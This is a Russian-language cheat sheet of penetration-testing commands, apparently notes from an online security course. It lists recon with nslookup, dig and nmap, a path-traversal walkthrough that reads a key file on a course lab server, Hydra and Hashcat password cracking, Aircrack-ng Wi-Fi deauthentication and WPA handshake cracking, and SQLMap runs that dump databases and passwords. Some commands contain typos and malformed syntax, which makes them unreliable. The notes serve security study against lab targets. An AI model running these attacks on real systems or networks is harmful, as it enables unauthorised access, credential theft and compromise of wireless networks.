Безопасность

nslookup

Установка 

apt-get install nslookup

Узнать IP 

nslookup site.ru

Для определения MX-записей введите команду:

nslookup –type=MX site.ru

Определение NS-серверов:

nslookup –type=ns site.ru

Для определения SOA-записи введите команду:

nslookup –type=SOA site.ru

Как изменить интервал ожидания

nslookup –timeout=10 site.ru

Где:

10 ― это количество секунд, за которое должен прийти ответ,

site.ru ― нужное доменное имя.

Dig

dig zonetransfer.me @nsztm2.digi.ninja axfr

whois

whois stepik.org|grep @

Поиск текстовых документов на сайте

site:stepik.org filetype:txt

Сканирование портов

nmap -A  demo.seclab.stepic.org

nmap -Pn demo.seclab.stepic.org

snap install zaproxy --classic

https://www.zaproxy.org/docs/docker/

host

host stepik.org

Загрузка страницы

wget -O - https://stepik.org

curl https://stepik.org

Обход 403

0) Мы также знаем, что на сервере лежит ключ по ссылке http://enter.seclab.stepic.org/keys/key.txt

нам важна часть keys/key.txt 

1) Переходим http://enter.seclab.stepic.org/getpage.php?page=pluto.tmpl

2) Начинаем ходить по директориям, используя боевые ../  http://enter.seclab.stepic.org/getpage.php?page=../pluto.tmpl

НАС ПРЕДУПРЕЖДАЮТ: 

Warning: require_once(go/templates/../pluto.tmpl): failed to open stream: No such file or directory in /opt/www/enter/getpage.php on line 10

Fatal error: require_once(): Failed opening required 'go/templates/../pluto.tmpl' (include_path='.:/usr/share/php:/usr/share/pear') in /opt/www/enter/getpage.php on line 10

3) Изменяем "файл" pluto.tmpl на keys/key.txt

4) Поднимаемся ещё на уровень ../../keys/key.txt 

5) Enter the void!

Закодирование текста в строке и декодирование

Base64

Base64 -D

Hydra

hydra -l ЛОГИН|-L ФАЙЛ] -p ПАРОЛЬ-P ФАЙЛ | [-C ФАЙЛ]] [-e nsr] [-o ФАЙЛ] [-t ЗАДАЧИ] [-M ФАЙЛ [-T ЗАДАЧИ]] [-w ВРЕМЯ] [-W ВРЕМЯ] [-f] [-s ПОРТ] [-x МИН:МАКС:НАБОРЫ СИМВОЛОВ] [-SOuvVd46] [service://server[:ПОРТ][/OPT]]
Опции:
-S        выполнить SSL соединение
-s ПОРТ   если служба не на порту по умолчанию, то можно задать порт здесь
-l ЛОГИН или -L ФАЙЛ с ЛОГИНАМИ (именами), или загрузить несколько логинов из ФАЙЛА
-p ПАРОЛЬ  или -P ФАЙЛ с паролями для перебора, или загрузить несколько паролей из ФАЙЛА
-x МИНИМУМ:МАКСИМУМ:НАБОР_СИМВОЛОВ  генерация паролей для брутфорса, наберите "-x -h" для помощи
-e nsr    "n" — пробовать с пустым паролем, "s" — логин в качестве пароля и/или "r" — реверс учётных данных
-C ФАЙЛ   формат где "логин:пароль" разделены двоеточиями, вместо опции -L/-P 
-o ФАЙЛ   записывать найденные пары логин/пароль в ФАЙЛ вместо стандартного вывода

sudo hydra -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt 192.168.0.107 -s 8000 http-post-form "/sql/sql_1.php:login_2=^USER#&password_2=^PASS^&post_2=post_2:not found"

Anonsurf

AnonSurf — скрипт для включения службы Tor и перенаправления трафика (в том числе DNS запросов), через анонимную распределенную сеть Tor.

mkdir Anonsurf && cd Anonsurf

git clone https://github.com/Und3rf10w/kali-anonsurf.git

sudo ./installer.sh

sudo anonsurf

anonsurf start

Hashcat

hashcat -m 0 -a 0 -o cracked.txt target_hashes.txt /usr/share/wordlists/rockyou.txt

-m 0 обозначает тип хеша, который мы взламываем (MD5).

-a 0 обозначает атаку по словарю.

-o cracked.txt — указываем выходной файл для взломанных паролей.

target_hashes.txt — наш входной файл хэшей, которые необходимо взломать.

/usr/share/wordlists/rockyou.txt — это абсолютный путь к файлу списка слов для этой атаки по словарю.

https://hashcat.net/cap2hashcat/

echo -n “Password” | md5sum | tr -d ” -” >> target_hashes.txt

hashcat -m 0 -a 0 -o cracked.txt target_hashes.txt /usr/share/wordlists/rockyou.txt

NMap

nmap -v -T5 -p 0-65535 -A 192.168.0.110 -oA meta -sV -o

Aircrack-ng

Просмотреть список адаптеров

ifconfig

Необходимо перевести WiFi-адпатер в режим монитора. 

sudo airmon-ng start wln0

sudo kill [pid]

Запустите airodump-ng для отображения всех сетей Wi-Fi.

sudo airdump-ng  wln0

Команда помимо прочего отобразит BSSID (мак-адрес), мощность сигнала (PWR) и CH (канал сети).

Скопируйте BSSID и CH целевой сети.

sudo airodump-ng -c 11 --bssid A6:0C:ID:ID:ID:ID -w filename wln0mon

Запустите деаутентификации клиентов выбранной сети в новом терминале:

sudo aireplay-ng -0 1 -a WIFI:BSSID -c DEVICE:BSSID wln0mon

Вернитесь к предыдущему окну консоли, в котором появится сообщение о перехвате рукопожатие WPA.

Чтобы остановить процесс, нажмите сочетание клавиш CTRL + C.

Теперь у нас есть файл filename.cap. Мы можем либо использовать aircrack-ng для взлома пароля, либо конвертировать filename.cap в hash.hc22000, а затем взломать хэш с помощью hashcat.

Для взлома с помощью aircrack-ng используйте следующую команду.

aircrack-ng -w rockyou.txt -b BSSID filename.cap

Атака по словарю (список слов) с использованием популярного словаря rockyou.txt

Брутфорс с использованием hashcat:

hashcat -m 22000 hash.hc22000 rockyou.txt

hahscat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d

Приведенная выше команда предназначена для перебора 8-значного числового пароля.

SQLMap

sqlmap -u "http://192.168.0.107:8000/?id=1&send=Submit" --risk=2 --level=2 -dbs

sqlmap -u "http://192.168.0.107:8000/?id=1&send=Submit" --risk=2 --level=2 -D homestead --tables 

sqlmap -u "http://192.168.0.107:8000/?id=1&send=Submit" --risk=2 --level=2 -D homestead -T tab1 --dump 

sqlmap -u "http://192.168.0.107:8000/?id=1&send=Submit" --risk=2 --level=2 -D homestead -T tab1 --columns

sqlmap -u "http://192.168.0.107:8000/?id=1&send=Submit" --risk=2 --level=2 -D homestead -T tab1 --passwords

sqlmap -u "http://192.168.0.107:8000" --data="login=user&password=user&send=Submit" --risk=2 --level=2 --dbs